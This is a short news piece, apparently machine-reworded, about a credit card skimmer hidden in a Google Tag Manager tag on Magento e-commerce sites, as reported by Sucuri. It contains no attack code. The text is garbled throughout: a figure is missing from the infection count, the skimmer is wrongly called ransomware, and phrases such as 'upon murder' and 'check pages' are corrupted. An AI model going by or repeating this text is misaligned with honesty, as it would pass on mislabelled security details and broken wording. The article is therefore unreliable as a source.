Threat actors have been spotted delivering credit card skimmer malware targeting Magento-based e-commerce websites using Google Tag Manager ( GTM).
Sucuri, a business security company, claims that the code contains an opaque backdoor that allows attackers to gain persistent access despite appearing to be a common GTM and Google Analytics script for website analytics and advertising purposes.
As of writing, as many as have been found to be infected with the GTM identifier ( GTM-MLHK2N68 ) in question, down from six reported by Sucuri. GTM identifier refers to a box that contains the various scanning codes ( such as Google Analytics and Facebook Pixel ) as well as rules that are set up when certain conditions are met.
Additional research has revealed that the ransomware is being loaded from the” cms_block” stand in Magento. a JavaScript payload that serves as a credit card skimming is encoded into the GTM tag, which reads” content,” and contains a GTM tag.
Security researcher Puja Srivastava claimed that” this text was created to collect sensitive information that customers have entered during the checkout process and send to a remote server that the attackers have controlled.”
The malware is intended to steal credit card data from the check pages before sending it to an additional server upon murder.
GTM has been abused for nefarious uses before, not just once. Sucuri made the revelation in April 2018 that the application was being used for illegal purposes.
The growth comes a few weeks after the company revealed another WordPress campaign that allegedly used compromised admin accounts or plugin vulnerabilities to install malware that moved site visitors to harmful URLs.